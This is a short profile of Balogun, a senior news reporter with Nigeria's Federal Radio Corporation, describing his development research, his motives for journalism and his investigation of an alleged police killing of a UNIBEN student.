Balogun is a<br \/>\nSenior Reporter: News and Current Affairs with Federal Radio<br \/>\nCorporation of Nigeria, FRCN.<br \/>\nCurrently Balogun is researching on the use of Short Movies for<br \/>\nDevelopment: Mirroring the Options before the People \u2013 with a view to<br \/>\nrevolutionizing the mind-set of people in the rural areas towards<br \/>\ndevelopmental discourse; an attempt to stimulate a discourse that will<br \/>\nlead to building a link between aesthetic values of rural people\u2019s<br \/>\nexperience and development.<br \/>\nAccording to him, one of the major challenges I face as a reporter is<br \/>\npeople\u2019s attitude towards the profession. In recent times, the<br \/>\nprofession has witnessed a lot of quacks whose activities has led to<br \/>\nvote of no confidence by those who hitherto were willing to give<br \/>\ntimely and useful information that would help in the job.<br \/>\nI was motivated by the strong impact the pen profession has on the<br \/>\nsociety. The impact was driven by my passion to make a change in the<br \/>\nsociety. While growing up I saw a lot of things going wrong due to<br \/>\nlack of information, so I had the drive that someday I will have the<br \/>\nvoice to change negative narratives, send right information, and get<br \/>\nthe people and society at large to change for better.<br \/>\nMy most challenging report was when I had to investigate the extra<br \/>\njudicial killing of a UNIBEN undergraduate. It was challenging in the<br \/>\nsense that my Superiors in the office felt that I should not venture<br \/>\ninto the matter, while the high officers of the Nigeria police were<br \/>\nalso not interested in changing their earlier claim that the boy was<br \/>\nan armed robber and was killed during a cross fire between him and the<br \/>\npolice.
